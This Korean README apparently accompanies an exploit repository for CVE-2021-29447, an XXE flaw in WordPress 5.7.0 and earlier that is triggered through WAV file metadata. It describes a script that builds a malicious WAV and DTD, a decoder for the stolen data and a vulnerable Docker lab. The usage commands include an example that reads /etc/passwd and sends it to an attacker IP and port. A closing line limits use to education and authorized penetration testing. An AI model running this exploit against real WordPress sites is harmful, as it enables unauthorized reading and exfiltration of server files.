
이 저장소는 CVE-2021-29447에 대한 익스플로잇을 포함하고 있습니다. 이 취약점은 WordPress 5.7.0 및 이전 버전에 존재하는 XXE(XML External Entity) 취약점입니다. 이 취약점은 WAV 파일을 처리하는 미디어 라이브러리에 존재하며, 공격자가 서버에서 임의의 파일을 읽을 수 있게 합니다.
| 파일 | 설명 |
|---|---|
CVE-2021-29447.sh | WAV 페이로드 및 악성 DTD 파일을 생성하는 익스플로잇 스크립트 |
decode.php | 유출된 데이터를 디코딩하는 PHP 스크립트 (base64 + zlib) |
docker-compose.yml | 테스트용 취약한 WordPress Docker 환경 |
docker-compose up -d
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <archivo_objetivo>
매개변수:
-l 공격자 IP (LHOST)-p 공격자 포트 (LPORT)-f 서버에서 읽을 파일 경로-h 도움말 표시예시:
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd
유출된 데이터는 base64로 인코딩되고 zlib으로 압축됩니다. 이를 디코딩하려면:
php decode.php
이 익스플로잇은 WAV 파일의 메타데이터에 XXE 외부 엔티티를 삽입하는 방식으로 작동합니다. WordPress가 파일을 처리할 때 XML 파서가 외부 엔티티를 해석하여 서버가 파일 내용을 URL로 인코딩하여 공격자 서버에 HTTP 요청을 보내게 합니다.
이 코드는 교육 목적 및 승인된 침투 테스트 전용입니다. 명시적 허가 없이 시스템에 사용하지 마십시오.